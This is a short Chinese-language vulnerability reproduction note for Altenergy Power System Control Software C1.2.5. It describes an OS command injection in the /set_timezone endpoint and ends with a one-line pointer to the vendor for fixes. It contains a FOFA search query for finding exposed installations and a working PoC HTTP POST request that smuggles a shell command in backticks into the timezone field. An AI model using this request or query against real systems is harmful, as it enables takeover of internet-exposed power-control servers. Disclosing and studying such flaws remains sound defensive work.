0x01 产品简介
Altenergy Power System Control Software是Altenergy Power System推出的一款微型逆变器控制软件。
0x02 漏洞概述
Altenergy Power System Control Software C1.2.5版本存在安全漏洞,该系统/set_timezone存在操作系统命令注入漏洞,攻击者可执行任意命令获取服务器权限。
0x03 复现环境
FOFA:title="Altenergy Power Control Software"
0x04 漏洞复现
PoC
POST /index.php/management/set_timezone HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
timezone=`id > rce.txt`
验证
0x05 修复建议
目前厂商已发布修复措施解决此安全问题,建议使用此软件的用户参考网址获取解决方案:https://apsystems.com/。